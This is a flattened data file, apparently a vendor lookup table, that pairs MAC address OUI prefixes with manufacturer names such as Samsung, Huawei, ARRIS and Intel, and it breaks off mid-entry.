OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 388C50 LG Electronics DC0856 Alcatel-Lucent Enterprise 1CDA27 vivo Mobile Communication Co., Ltd. 90F305 HUMAX Co., Ltd. 4095BD NTmore.Co.,Ltd 98AAFC IEEE Registration Authority 00143F Hotway Technology Corporation D055B2 Integrated Device Technology (Malaysia) Sdn. Bhd. 144FD7 IEEE Registration Authority B85510 Zioncom Electronics (Shenzhen) Ltd. 049573 zte corporation F0D7AA Motorola Mobility LLC, a Lenovo Company F8FF0B Electronic Technology Inc. 7C6BF7 NTI co., ltd. 00D318 SPG Controls 3096FB Samsung Electronics Co.,Ltd 4827EA Samsung Electronics Co.,Ltd 7C787E Samsung Electronics Co.,Ltd 245BA7 Apple, Inc. 70F087 Apple, Inc. E0C63C SICHUAN TIANYI COMHEART TELECOMCO., LTD 000C46 Allied Telesyn Inc. 001F72 QingDao Hiphone Technology Co,.Ltd 002365 Insta Elektro GmbH 6091F3 vivo Mobile Communication Co., Ltd. 28395E Samsung Electronics Co.,Ltd 38295A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 88E628 Shenzhen Kezhonglong Optoelectronic Technology Co.,Ltd 58238C Technicolor CH USA Inc. CC82EB KYOCERA CORPORATION 14987D Technicolor CH USA Inc. D4CF37 Symbolic IO D47DFC TECNO MOBILE LIMITED 409F38 AzureWave Technology Inc. BC2F3D vivo Mobile Communication Co., Ltd. 40FA7F Preh Car Connect GmbH 000DBB Nippon Dentsu Co.,Ltd. 2C7E81 ARRIS Group, Inc. 407D0F HUAWEI TECHNOLOGIES CO.,LTD 68CC6E HUAWEI TECHNOLOGIES CO.,LTD 3034D2 Availink, Inc. 504061 Nokia 00108E HUGH SYMONS CONCEPT Technologies Ltd. E05163 Arcadyan Corporation 54E3F6 Alcatel-Lucent 40B034 Hewlett Packard B816DB CHANT SINCERE CO.,LTD 40B4CD Amazon Technologies Inc. D481D7 Dell Inc. F42B48 Ubiqam 50F14A Texas Instruments 04DEF2 Shenzhen ECOM Technology Co. Ltd 78C1A7 zte corporation 4C7872 Cav. Uff. Giacomo Cimberio S.p.A. 8CF5A3 SAMSUNG ELECTRO-MECHANICS(THAILAND) 8CC8F4 IEEE Registration Authority F483E1 Shanghai Clouder Semiconductor Co.,Ltd 083E5D Sagemcom Broadband SAS 3CBD3E Beijing Xiaomi Electronics Co., Ltd. 641A22 Heliospectra AB A084CB SonicSensory,Inc. D47AE2 Samsung Electronics Co.,Ltd 6854FD Amazon Technologies Inc. 0003BC COT GmbH D4B169 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited E44790 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 38454C Light Labs, Inc. 000A49 F5 Networks, Inc. 00A0C8 Adtran Inc F49651 NAKAYO Inc 446246 Comat AG 34FCB9 Hewlett Packard Enterprise 70918F Weber-Stephen Products LLC D8E0E1 Samsung Electronics Co.,Ltd 7C1015 Brilliant Home Technology, Inc. D8C771 HUAWEI TECHNOLOGIES CO.,LTD E02A82 Universal Global Scientific Industrial Co., Ltd. B0F963 Hangzhou H3C Technologies Co., Limited D490E0 Topcon Electronics GmbH & Co. KG A84041 Dragino Technology Co., Limited E02202 ARRIS Group, Inc. D825B0 Rockeetech Systems Co.,Ltd. 74614B Chongqing Huijiatong Information Technology Co., Ltd. 98D293 Google, Inc. CCB8A8 AMPAK Technology, Inc. 1077B0 Fiberhome Telecommunication Technologies Co.,LTD F01DBC Microsoft Corporation 34049E IEEE Registration Authority 94FB29 Zebra Technologies Inc. B0702D Apple, Inc. 6C19C0 Apple, Inc. 00204F DEUTSCHE AEROSPACE AG 00DBDF Intel Corporate 94A04E Bostex Technology Co., LTD 8CE117 zte corporation 688AF0 zte corporation C0210D SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 4CE2F1 sclak srl 504B5B CONTROLtronic GmbH B47447 CoreOS 80D4A5 HUAWEI TECHNOLOGIES CO.,LTD 04B0E7 HUAWEI TECHNOLOGIES CO.,LTD 446A2E HUAWEI TECHNOLOGIES CO.,LTD 0C8DDB Cisco Meraki B0EE7B Roku, Inc AC587B JCT Healthcare 1062EB D-Link International 000894 InnoVISION Multimedia Ltd. 480033 Technicolor CH USA Inc. A06FAA LG Innotek 0026AB Seiko Epson Corporation FC10C6 Taicang T&W Electronics 2C6FC9 Hon Hai Precision Ind. Co.,Ltd. 58EF68 Belkin International Inc. 000B4F Verifone 60C798 Verifone C8662C Beijing Haitai Fangyuan High Technology Co,.Ltd. 8096CA Hon Hai Precision Ind. Co.,Ltd. 186571 Top Victory Electronics (Taiwan) Co., Ltd. F83F51 Samsung Electronics Co.,Ltd 50D753 CONELCOM GmbH 0CC47A Super Micro Computer, Inc. 34D270 Amazon Technologies Inc. 50795B Interexport Telecomunicaciones S.A. 0016D9 NINGBO BIRD CO.,LTD. 6CA7FA YOUNGBO ENGINEERING INC. 8C7EB3 Lytro, Inc. B4B384 ShenZhen Figigantic Electronic Co.,Ltd 7828CA Sonos, Inc. 00C003 GLOBALNET COMMUNICATIONS 00234A Private 2C402B Smart iBlue Technology Limited 5C6B4F Hello Inc. 2C9924 ARRIS Group, Inc. D058A8 zte corporation D071C4 zte corporation A0CC2B Murata Manufacturing Co., Ltd. 5001D9 HUAWEI TECHNOLOGIES CO.,LTD 00271C MERCURY CORPORATION E0D9E3 Eltex Enterprise Ltd. 805EC0 YEALINK(XIAMEN) NETWORK TECHNOLOGY CO.,LTD. 007B18 SENTRY Co., LTD. 144D67 Zioncom Electronics (Shenzhen) Ltd. 4CE173 IEEE Registration Authority 0CD86C SHENZHEN FAST TECHNOLOGIES CO.,LTD 049790 Lartech telecom LLC 28EED3 Shenzhen Super D Technology Co., Ltd 24C44A zte corporation 98541B Intel Corporate 1C40E8 SHENZHEN PROGRESS&WIN TECHNOLOGY CO.,LTD 0023D2 Inhand Electronics, Inc. DC0B34 LG Electronics (Mobile Communications) 404E36 HTC Corporation A8E705 Fiberhome Telecommunication Technologies Co.,LTD 9840BB Dell Inc. 0060D6 NovAtel Inc. 503AA0 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. B0958E TP-LINK TECHNOLOGIES CO.,LTD. C025E9 TP-LINK TECHNOLOGIES CO.,LTD. 802AA8 Ubiquiti Networks Inc. F09FC2 Ubiquiti Networks Inc. 188B15 ShenZhen ZhongRuiJing Technology co.,LTD 788A20 Ubiquiti Networks Inc. 886B0F Bluegiga Technologies OY AC84C9 Sagemcom Broadband SAS 245CBF NCSE 2C3361 Apple, Inc. 60A4D0 Samsung Electronics Co.,Ltd 008701 Samsung Electronics Co.,Ltd 5C9960 Samsung Electronics Co.,Ltd 9C62AB Sumavision Technologies Co.,Ltd C8F946 LOCOSYS Technology Inc. 487B6B HUAWEI TECHNOLOGIES CO.,LTD 883FD3 HUAWEI TECHNOLOGIES CO.,LTD 240D65 Shenzhen Vsun Communication Technology Co., Ltd. 000B14 ViewSonic Corporation C8028F Nova Electronics (Shanghai) Co., Ltd. A46011 Verifone 5CA933 Luma Home 00137E CorEdge Networks, Inc. D814D6 SURE SYSTEM Co Ltd 6CEFC6 SHENZHEN TWOWING TECHNOLOGIES CO.,LTD. 101DC0 Samsung Electronics Co.,Ltd 002341 Vanderbilt International (SWE) AB 407C7D Nokia 24590B White Sky Inc. Limited 68EBAE Samsung Electronics Co.,Ltd 444E1A Samsung Electronics Co.,Ltd 143365 TEM Mobile Limited 801844 Dell Inc. 78471D Samsung Electronics Co.,Ltd A07591 Samsung Electronics Co.,Ltd 0CDFA4 Samsung Electronics Co.,Ltd B072BF Murata Manufacturing Co., Ltd. 701DC4 NorthStar Battery Company, LLC 64DAA0 Robert Bosch Smart Home GmbH 14B837 Shenzhen YOUHUA Technology Co., Ltd 5C8613 Beijing Zhoenet Technology Co., Ltd CC7314 HONG KONG WHEATEK TECHNOLOGY LIMITED B8EE65 Liteon Technology Corporation 985BB0 KMDATA INC. E006E6 Hon Hai Precision Ind. Co.,Ltd. BC8556 Hon Hai Precision Ind. Co.,Ltd. 342387 Hon Hai Precision Ind. Co.,Ltd. 002637 SAMSUNG ELECTRO MECHANICS CO., LTD. 002119 SAMSUNG ELECTRO MECHANICS CO., LTD. F4D9FB Samsung Electronics Co.,Ltd 3C6200 Samsung Electronics Co.,Ltd C417FE Hon Hai Precision Ind. Co.,Ltd. 9439E5 Hon Hai Precision Ind. Co.,Ltd. 642737 Hon Hai Precision Ind. Co.,Ltd. A41731 Hon Hai Precision Ind. Co.,Ltd. 5CA39D SAMSUNG ELECTRO MECHANICS CO., LTD. 90187C SAMSUNG ELECTRO MECHANICS CO., LTD. 50CCF8 SAMSUNG ELECTRO MECHANICS CO., LTD. 00223B Communication Networks, LLC C0F8DA Hon Hai Precision Ind. Co.,Ltd. 0011FF Digitro Tecnologia Ltda 001B94 T.E.M.A. S.p.A. F0F002 Hon Hai Precision Ind. Co.,Ltd. C0CB38 Hon Hai Precision Ind. Co.,Ltd. F07BCB Hon Hai Precision Ind. Co.,Ltd. 50B7C3 Samsung Electronics Co.,Ltd 1C5A3E Samsung Electronics Co.,Ltd A02195 Samsung Electronics Co.,Ltd B07870 Wi-NEXT, Inc. E47CF9 Samsung Electronics Co.,Ltd 4844F7 Samsung Electronics Co.,Ltd 001377 Samsung Electronics Co.,Ltd 002454 Samsung Electronics Co.,Ltd E81132 Samsung Electronics Co.,Ltd C06599 Samsung Electronics Co.,Ltd BC79AD Samsung Electronics Co.,Ltd 4C3C16 Samsung Electronics Co.,Ltd 0073E0 Samsung Electronics Co.,Ltd 0017D5 Samsung Electronics Co.,Ltd 001E7D Samsung Electronics Co.,Ltd 001DF6 Samsung Electronics Co.,Ltd F008F1 Samsung Electronics Co.,Ltd 58C38B Samsung Electronics Co.,Ltd 00E3B2 Samsung Electronics Co.,Ltd 301966 Samsung Electronics Co.,Ltd F0E77E Samsung Electronics Co.,Ltd 94350A Samsung Electronics Co.,Ltd 001D25 Samsung Electronics Co.,Ltd E4C1F1 SHENZHEN SPOTMAU INFORMATION TECHNOLIGY CO., Ltd 240AC4 Espressif Inc. 343111 Samsung Electronics Co.,Ltd 08FD0E Samsung Electronics Co.,Ltd 041BBA Samsung Electronics Co.,Ltd 889B39 Samsung Electronics Co.,Ltd E432CB Samsung Electronics Co.,Ltd BC8CCD SAMSUNG ELECTRO-MECHANICS(THAILAND) D022BE SAMSUNG ELECTRO-MECHANICS(THAILAND) EC9BF3 SAMSUNG ELECTRO-MECHANICS(THAILAND) F409D8 SAMSUNG ELECTRO-MECHANICS(THAILAND) 10D542 Samsung Electronics Co.,Ltd A0821F Samsung Electronics Co.,Ltd F06BCA Samsung Electronics Co.,Ltd AC3613 Samsung Electronics Co.,Ltd 002611 Licera AB 005094 ARRIS Group, Inc. E0B7B1 ARRIS Group, Inc. D82522 ARRIS Group, Inc. F0038C AzureWave Technology Inc. 18D276 HUAWEI TECHNOLOGIES CO.,LTD 005218 Wuxi Keboda Electron Co.Ltd 001E81 CNB Technology Inc. 7CA97D Objenious A8A648 Qingdao Hisense Communications Co.,Ltd. 985DAD Texas Instruments D43639 Texas Instruments BC282C e-Smart Systems Pvt. Ltd A40DBC Xiamen Intretech Inc. 84EF18 Intel Corporate 84C1C1 Juniper Networks A81B6A Texas Instruments 343DC4 BUFFALO.INC B0F893 Shanghai MXCHIP Information Technology Co., Ltd. C411E0 Bull Group Co., Ltd 28C87A ARRIS Group, Inc. 48FD8E HUAWEI TECHNOLOGIES CO.,LTD 7C0623 Ultra Electronics Sonar System Division 28AC67 Mach Power, Rappresentanze Internazionali s.r.l. 14825B Hefei Radio Communication Technology Co., Ltd 641269 ARRIS Group, Inc. 0002C9 Mellanox Technologies, Inc. 080051 ExperData 00126C Visonic Technologies 1993 Ltd. AC6175 HUAWEI TECHNOLOGIES CO.,LTD 244427 HUAWEI TECHNOLOGIES CO.,LTD 0080C7 XIRCOM 000138 XAVi Technologies Corp. 00166D Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd 3C9157 Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd 0000D8 Novell, Inc. 001F46 Nortel Networks 003093 Sonnet Technologies, Inc 00034B Nortel Networks 002561 ProCurve Networking by HP 008058 PRINTER SYSTEMS CORP. 00157D POSDATA 4849C7 Samsung Electronics Co.,Ltd 849866 Samsung Electronics Co.,Ltd 001C9C Nortel Networks 001B25 Nortel Networks 0019E1 Nortel Networks 001D42 Nortel Networks 00140D Nortel Networks 000E40 Nortel Networks FCB0C4 Shanghai DareGlobal Technologies Co.,Ltd A89DD2 Shanghai DareGlobal Technologies Co.,Ltd 00E00F Shanghai Baud Data Communication Co.,Ltd. 28BE03 TCT mobile ltd 903AE6 PARROT SA A098ED Shandong Intelligent Optical Communication Development Co., Ltd. 000EF4 Kasda Networks Inc 00167A Skyworth Overseas Development Ltd. A42940 Shenzhen YOUHUA Technology Co., Ltd E4A387 Control Solutions LLC 1880F5 Alcatel-Lucent Shanghai Bell Co., Ltd 10E878 Nokia 10F96F LG Electronics (Mobile Communications) C4438F LG Electronics (Mobile Communications) A09169 LG Electronics (Mobile Communications) 286C07 XIAOMI Electronics,CO.,LTD 002280 A2B Electronics AB 404AD4 Widex A/S 9893CC LG ELECTRONICS INC 3CCD93 LG ELECTRONICS INC 2021A5 LG Electronics (Mobile Communications) 6CD68A LG Electronics (Mobile Communications) CC79CF SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 001925 Intelicis Corporation 9476B7 Samsung Electronics Co.,Ltd 2C54CF LG Electronics (Mobile Communications) 485929 LG Electronics (Mobile Communications) 58A2B5 LG Electronics (Mobile Communications) 002483 LG Electronics (Mobile Communications) 001FE3 LG Electronics (Mobile Communications) F0421C Intel Corporate 000F62 Alcatel Bell Space N.V. 001CD8 BlueAnt Wireless 0019AB Raycom CO ., LTD 4C334E HIGHTECH 7C70BC IEEE Registration Authority E81863 IEEE Registration Authority 2CD141 IEEE Registration Authority 3C39E7 IEEE Registration Authority BC6641 IEEE Registration Authority 80E4DA IEEE Registration Authority 885D90 IEEE Registration Authority C88ED1 IEEE Registration Authority B01F81 IEEE Registration Authority 549A11 IEEE Registration Authority B8D812 IEEE Registration Authority 1C21D1 IEEE Registration Authority 283638 IEEE Registration Authority F485C6 FDT Technologies D404FF Juniper Networks C8755B Quantify Technology Pty. Ltd. 88124E Qualcomm Inc. 001428 Vocollect Inc 006B9E Vizio, Inc 4C6641 SAMSUNG ELECTRO-MECHANICS(THAILAND) 5CA86A HUAWEI TECHNOLOGIES CO.,LTD 001B32 QLogic Corporation 0017CA Qisda Corporation 70F395 Universal Global Scientific Industrial Co., Ltd. 48F7C0 Technicolor CH USA Inc. 0015B7 Toshiba E89D87 Toshiba E09579 ORTHOsoft inc, d/b/a Zimmer CAS A0ADA1 JMR Electronics, Inc BCC00F Fiberhome Telecommunication Technologies Co.,LTD 9CA5C0 vivo Mobile Communication Co., Ltd. 80C6AB Technicolor CH USA Inc. 90A4DE Wistron Neweb Corporation 70E284 Wistron Infocomm (Zhongshan) Corporation A854B2 Wistron Neweb Corporation 3044A1 Shanghai Nanchao Information Technology CC03FA Technicolor CH USA Inc. E0ACF1 Cisco Systems, Inc 00015B ITALTEL S.p.A/RF-UP-I 00A0A8 RENEX CORPORATION 00C0AB Telco Systems, Inc. 0023F8 Zyxel Communications Corporation 0019CB Zyxel Communications Corporation 2C094D Raptor Engineering, LLC AC3743 HTC Corporation 001D7E Cisco-Linksys, LLC E4FB8F MOBIWIRE MOBILES (NINGBO) CO.,LTD 10BD55 Q-Lab Corporation C449BB MITSUMI ELECTRIC CO.,LTD. FC2D5E zte corporation B40418 Smartchip Integrated Inc. 90CF7D Qingdao Hisense Communications Co.,Ltd. F40A4A INDUSNET Communication Technology Co.,LTD F85A00 Sanford LP FC55DC Baltic Latvian Universal Electronics LLC 08010F SICHUAN TIANYI COMHEART TELECOMCO.,LTD 941882 Hewlett Packard Enterprise 6038E0 Belkin International Inc. 8850DD Infiniband Trade Association 002550 Riverbed Technology, Inc. D0B2C4 Technicolor CH USA Inc. 50AB3E Qibixx AG 3876CA Shenzhen Smart Intelligent Technology Co.Ltd 042758 HUAWEI TECHNOLOGIES CO.,LTD 9CE374 HUAWEI TECHNOLOGIES CO.,LTD 8CD2E9 YOKOTE SEIKO CO., LTD. B8BBAF Samsung Electronics Co.,Ltd 60C5AD Samsung Electronics Co.,Ltd 442C05 AMPAK Technology, Inc. 8C897A AUGTEK F845AD Konka Group Co., Ltd. 000FE2 Hangzhou H3C Technologies Co., Limited 80F62E Hangzhou H3C Technologies Co., Limited 608D17 Sentrus Government Systems Division, Inc ECADB8 Apple, Inc. 9801A7 Apple, Inc. 6879ED SHARP Corporation 002382 Lih Rong electronic Enterprise Co., Ltd. 24F094 Apple, Inc. 086D41 Apple, Inc. B4D5BD Intel Corporate 98AA3C Will i-tech Co., Ltd. BCAD28 Hangzhou Hikvision Digital Technology Co.,Ltd. F4911E ZHUHAI EWPE INFORMATION TECHNOLOGY INC 002552 VXi Corporation 6CE983 Gastron Co., LTD. 28E31F Xiaomi Communications Co Ltd 989096 Dell Inc. DC3752 GE DCD916 HUAWEI TECHNOLOGIES CO.,LTD 00022E TEAC Corp. R& D 0060B0 Hewlett Packard 7C738B Cocoon Alarm Ltd F80F84 Natural Security SAS 44A42D TCT mobile ltd 70F96D Hangzhou H3C Technologies Co., Limited BC6A44 Commend International GmbH F0EE58 PACE Telematics GmbH 083FBC zte corporation 00C0F0 Kingston Technology Company, Inc. 943BB1 Kaonmedia CO., LTD. 0018D7 JAVAD GNSS, Inc. 001F09 Jastec AC620D Jabil Circuit(Wuxi) Co.,Ltd 08000D International Computers, Ltd 1C7370 Neotech 30E37A Intel Corporate 0000C9 Emulex Corporation 0040AA Valmet Automation D0B0CD Moen 7050AF BSkyB Ltd F4EF9E SGSG SCIENCE & TECHNOLOGY CO. LTD 1C740D Zyxel Communications Corporation 603ECA Cambridge Medical Robotics Ltd 001F1F Edimax Technology Co. Ltd. 00020E ECI Telecom Ltd. 200A5E Xiangshan Giant Eagle Technology Developing Co., Ltd. 9C741A HUAWEI TECHNOLOGIES CO.,LTD E4A8B6 HUAWEI TECHNOLOGIES CO.,LTD 244C07 HUAWEI TECHNOLOGIES CO.,LTD 746FF7 Wistron Neweb Corporation B8AEED Elitegroup Computer Systems Co.,Ltd. 000DB0 Olym-tech Co.,Ltd. 30F6B9 Ecocentric Energy 847BEB Dell Inc. 54511B HUAWEI TECHNOLOGIES CO.,LTD 68536C SPnS Co.,Ltd 1CEA1B Nokia D4612E HUAWEI TECHNOLOGIES CO.,LTD B0E2E5 Fiberhome Telecommunication Technologies Co.,LTD 001FA7 Sony Interactive Entertainment Inc. 9046A2 Tedipay UK Ltd 6479A7 Phison Electronics Corp. CCB11A Samsung Electronics Co.,Ltd 703C03 RadiAnt Co.,Ltd 00C164 Cisco Systems, Inc DC2DCB Beijing Unis HengYue Technology Co., Ltd. 2C9662 Invenit BV CCD3E2 Jiangsu YinheElectronics Co.,Ltd. E4FAED Samsung Electronics Co.,Ltd 288335 Samsung Electronics Co.,Ltd DCCF96 Samsung Electronics Co.,Ltd AC44F2 YAMAHA CORPORATION 1C5F2B D-Link International 1C98EC Hewlett Packard Enterprise 70661B Sonova AG B07FB9 NETGEAR 047E4A moobox CO., Ltd. 0080E5 NetApp 9C5C8E ASUSTek COMPUTER INC. C88722 Lumenpulse 84683E Intel Corporate E0CDFD Beijing E3Control Technology Co, LTD 000895 DIRC Technologie GmbH & Co.KG 60ACC8 KunTeng Inc. CCB3AB shenzhen Biocare Bio-Medical Equipment Co.,Ltd. E4B318 Intel Corporate 743E2B Ruckus Wireless E0C767 Apple, Inc. 80ED2C Apple, Inc. F03404 TCT mobile ltd 80D160 Integrated Device Technology (Malaysia) Sdn. Bhd. 30785C Partow Tamas Novin (Parman) 246968 TP-LINK TECHNOLOGIES CO.,LTD. 8CA2FD Starry, Inc. 84BA3B CANON INC. 000585 Juniper Networks 204E71 Juniper Networks 00194F Nokia Danmark A/S 00BD3A Nokia Corporation 80501B Nokia Corporation A04E04 Nokia Corporation 001262 Nokia Danmark A/S 0014A7 Nokia Danmark A/S 0015A0 Nokia Danmark A/S 0016BC Nokia Danmark A/S 00174B Nokia Danmark A/S 002669 Nokia Danmark A/S AC61EA Apple, Inc. 38B54D Apple, Inc. 1C5CF2 Apple, Inc. A87E33 Nokia Danmark A/S 002403 Nokia Danmark A/S 002404 Nokia Danmark A/S 0019B7 Nokia Danmark A/S 0017B0 Nokia Danmark A/S 002109 Nokia Danmark A/S 002108 Nokia Danmark A/S 001B33 Nokia Danmark A/S 0015DE Nokia Danmark A/S 0002EE Nokia Danmark A/S D8F710 Libre Wireless Technologies Inc. 3C591E TCL King Electrical Appliances (Huizhou) Co., Ltd C43655 Shenzhen Fenglian Technology Co., Ltd. E0B9E5 Technicolor 0030DA Comtrend Corporation 64680C Comtrend Corporation 3872C0 Comtrend Corporation A80600 Samsung Electronics Co.,Ltd 002682 Gemtek Technology Co., Ltd. 0009E1 Gemtek Technology Co., Ltd. 14C126 Nokia Corporation 600194 Espressif Inc. F05A09 Samsung Electronics Co.,Ltd 503275 Samsung Electronics Co.,Ltd 08FC88 Samsung Electronics Co.,Ltd 0270B3 DATA RECALL LTD. 000136 CyberTAN Technology Inc. D04D2C Roku, Inc. B0A737 Roku, Inc. 140C76 FREEBOX SAS 001BE9 Broadcom 0019C7 Cambridge Industries(Group) Co.,Ltd. 70D931 Cambridge Industries(Group) Co.,Ltd. 029D8E CARDIAC RECORDERS, INC. 00402A Canoga Perkins Corporation A4C7DE Cambridge Industries(Group) Co.,Ltd. D8B8F6 Nantworks 008077 Brother industries, LTD. 24F5AA Samsung Electronics Co.,Ltd 988389 Samsung Electronics Co.,Ltd 84A466 Samsung Electronics Co.,Ltd C4576E Samsung Electronics Co.,Ltd 508569 Samsung Electronics Co.,Ltd 0060BB Cabletron Systems, Inc. F8D0BD Samsung Electronics Co.,Ltd 78595E Samsung Electronics Co.,Ltd 0C1420 Samsung Electronics Co.,Ltd 94B10A Samsung Electronics Co.,Ltd 3CBBFD Samsung Electronics Co.,Ltd A48431 Samsung Electronics Co.,Ltd A0B4A5 Samsung Electronics Co.,Ltd E4F8EF Samsung Electronics Co.,Ltd DC446D Allwinner Technology Co., Ltd 745AAA HUAWEI TECHNOLOGIES CO.,LTD 04FE8D HUAWEI TECHNOLOGIES CO.,LTD 001333 BaudTec Corporation 58671A Barnes&Noble 002675 Aztech Electronics Pte Ltd 0024FE AVM GmbH C02506 AVM GmbH 405D82 NETGEAR DCEF09 NETGEAR DC64B8 Shenzhen JingHanDa Electronics Co.Ltd 000D92 ARIMA Communications Corp. 002163 ASKEY COMPUTER CORP A8D3F7 Arcadyan Technology Corporation 4C60DE NETGEAR C43DC7 NETGEAR 489D24 BlackBerry RTS 08BD43 NETGEAR 44EE02 MTI Ltd. 5856E8 ARRIS Group, Inc. F80BBE ARRIS Group, Inc. DC4517 ARRIS Group, Inc. C8AA21 ARRIS Group, Inc. 0017EE ARRIS Group, Inc. 00111A ARRIS Group, Inc. 000F9F ARRIS Group, Inc. 0004BD ARRIS Group, Inc. 002642 ARRIS Group, Inc. 0024A1 ARRIS Group, Inc. 002210 ARRIS Group, Inc. 0022B4 ARRIS Group, Inc. 00149A ARRIS Group, Inc. 0014E8 ARRIS Group, Inc. 0019C0 ARRIS Group, Inc. 00E06F ARRIS Group, Inc. 8096B1 ARRIS Group, Inc. 707E43 ARRIS Group, Inc. 00152F ARRIS Group, Inc. 001FC4 ARRIS Group, Inc. 001CFB ARRIS Group, Inc. 002395 ARRIS Group, Inc. 0023AF ARRIS Group, Inc. F87B7A ARRIS Group, Inc. 0000F4 Allied Telesis, Inc. 001577 Allied Telesis, Inc. 001AEB Allied Telesis R&D Center K.K. 703C39 SEAWING Kft 9097D5 Espressif Inc. ACD074 Espressif Inc. 38E3C5 Taicang T&W Electronics 0015CE ARRIS Group, Inc. 0015A2 ARRIS Group, Inc. 0015A3 ARRIS Group, Inc. 0015A4 ARRIS Group, Inc. 0000CA ARRIS Group, Inc. 709E29 Sony Interactive Entertainment Inc. A4DB30 Liteon Technology Corporation 40F02F Liteon Technology Corporation 74C246 Amazon Technologies Inc. 000FA3 Alpha Networks Inc. 001D6A Alpha Networks Inc. 002345 Sony Mobile Communications Inc 6C0E0D Sony Mobile Communications Inc 6C23B9 Sony Mobile Communications Inc 3017C8 Sony Mobile Communications Inc 0012EE Sony Mobile Communications Inc 001620 Sony Mobile Communications Inc 001963 Sony Mobile Communications Inc 001FE4 Sony Mobile Communications Inc 205476 Sony Mobile Communications Inc 001A80 Sony Corporation 8841FC AirTies Wireless Networks 0030D3 Agilent Technologies, Inc. 00A02F ADB Broadband Italia 98743D Shenzhen Jun Kai Hengye Technology Co. Ltd A0F459 FN-LINK TECHNOLOGY LIMITED 586356 FN-LINK TECHNOLOGY LIMITED 8CB864 AcSiP Technology Corp. 5CE2F4 AcSiP Technology Corp. B8616F Accton Technology Corp 0012CF Accton Technology Corp 0030F1 Accton Technology Corp 705A0F Hewlett Packard 4495FA Qingdao Santong Digital Technology Co.Ltd 0025D3 AzureWave Technology Inc. 1C4BD6 AzureWave Technology Inc. 08A95A AzureWave Technology Inc. 94DBC9 AzureWave Technology Inc. 240A64 AzureWave Technology Inc. 40E230 AzureWave Technology Inc. 80D21D AzureWave Technology Inc. D4D184 ADB Broadband Italia A04FD4 ADB Broadband Italia D00ED9 Taicang T&W Electronics 541473Wingtech Group (HongKong)Limited 8086F2 Intel Corporate E09467 Intel Corporate 08D40C Intel Corporate 6C8814 Intel Corporate 303A64 Intel Corporate ACFDCE Intel Corporate 7CCCB8 Intel Corporate F40669 Intel Corporate 001DE1 Intel Corporate 90E2BA Intel Corporate 0026C7 Intel Corporate 0026C6 Intel Corporate 0CCC26 Airenetworks E09D31 Intel Corporate 88532E Intel Corporate 74C99A Ericsson AB 5CC213 Fr. Sauter AG 28101B MagnaCom 001676 Intel Corporate 0016EA Intel Corporate 001B77 Intel Corporate 001CC0 Intel Corporate 104A7D Intel Corporate 001AA0 Dell Inc. 0019B9 Dell Inc. 00B0D0 Dell Inc. 00C04F Dell Inc. B07994 Motorola Mobility LLC, a Lenovo Company A470D6 Motorola Mobility LLC, a Lenovo Company 74867A Dell Inc. 180373 Dell Inc. 14FEB5 Dell Inc. 782BCB Dell Inc. 001F3B Intel Corporate 00215D Intel Corporate 00216A Intel Corporate 001C23 Dell Inc. A4BADB Dell Inc. 002564 Dell Inc. A41F72 Dell Inc. C46699 vivo Mobile Communication Co., Ltd. C8F230 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 8C0EE3 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD C8CD72 Sagemcom Broadband SAS F82C18 2Wire Inc 18017D Harbin Arteor technology co., LTD 001556 Sagemcom Broadband SAS C0D044 Sagemcom Broadband SAS A01B29 Sagemcom Broadband SAS 74E14A IEEE Registration Authority 0CEFAF IEEE Registration Authority F80278 IEEE Registration Authority A0BB3E IEEE Registration Authority 884AEA Texas Instruments 0022A4 2Wire Inc 982CBE 2Wire Inc 640F28 2Wire Inc 00123F Dell Inc. 000BDB Dell Inc. 204747 Dell Inc. 001495 2Wire Inc 348AAE Sagemcom Broadband SAS 7C03D8 Sagemcom Broadband SAS C0AC54 Sagemcom Broadband SAS 2C3996 Sagemcom Broadband SAS F08261 Sagemcom Broadband SAS 0030C5 CADENCE DESIGN SYSTEMS, INC. D08CB5 Texas Instruments 00182F Texas Instruments 0017EA Texas Instruments 0021BA Texas Instruments BC0DA5 Texas Instruments CC8CE3 Texas Instruments E0D7BA Texas Instruments 1CE2CC Texas Instruments 985945 Texas Instruments 944452 Belkin International Inc. B0B448 Texas Instruments D494A1 Texas Instruments 0014BF Cisco-Linksys, LLC CCB255 D-Link International 28107B D-Link International FC7516 D-Link International 84C9B2 D-Link International C8D3A3 D-Link International 3CBB73 Shenzhen Xinguodu Technology Co., Ltd. 0C47C9 Amazon Technologies Inc. 0050BA D-Link Corporation 00179A D-Link Corporation 001CF0 D-Link Corporation 001E58 D-Link Corporation 0022B0 D-Link Corporation 002401 D-Link Corporation 1CAFF7 D-Link International 14D64D D-Link International 9094E4 D-Link International B499BA Hewlett Packard 047863 Shanghai MXCHIP Information Technology Co., Ltd. 409F87 Jide Technology (Hong Kong) Limited 0CF9C0 BSkyB Ltd 4CFF12 Fuze Entertainment Co., ltd AC9A22 NXP Semiconductors 287CDB HefeiToycloud Technology Co.,ltd 806AB0 Shenzhen TINNO Mobile Technology Corp. 48AD08 HUAWEI TECHNOLOGIES CO.,LTD 4CFB45 HUAWEI TECHNOLOGIES CO.,LTD 009ACD HUAWEI TECHNOLOGIES CO.,LTD 3C5AB4 Google, Inc. F4F5E8 Google, Inc. 94EB2C Google, Inc. 0CC731 Currant, Inc. 70B3D5 IEEE Registration Authority 28ED6A Apple, Inc. C056E3 Hangzhou Hikvision Digital Technology Co.,Ltd. EC3EF7 Juniper Networks 0CF893 ARRIS Group, Inc. 3CDFA9 ARRIS Group, Inc. 8461A0 ARRIS Group, Inc. 0015D1 ARRIS Group, Inc. 001DD0 ARRIS Group, Inc. 001DD3 ARRIS Group, Inc. ACB313 ARRIS Group, Inc. 38F23E Microsoft Mobile Oy E4F89C Intel Corporate 6CA100 Intel Corporate 2C4138 Hewlett Packard 441EA1 Hewlett Packard 78E7D1 Hewlett Packard 5C8FE0 ARRIS Group, Inc. 90C792 ARRIS Group, Inc. BCCAB5 ARRIS Group, Inc. D039B3 ARRIS Group, Inc. 000FCC ARRIS Group, Inc. 0012F0 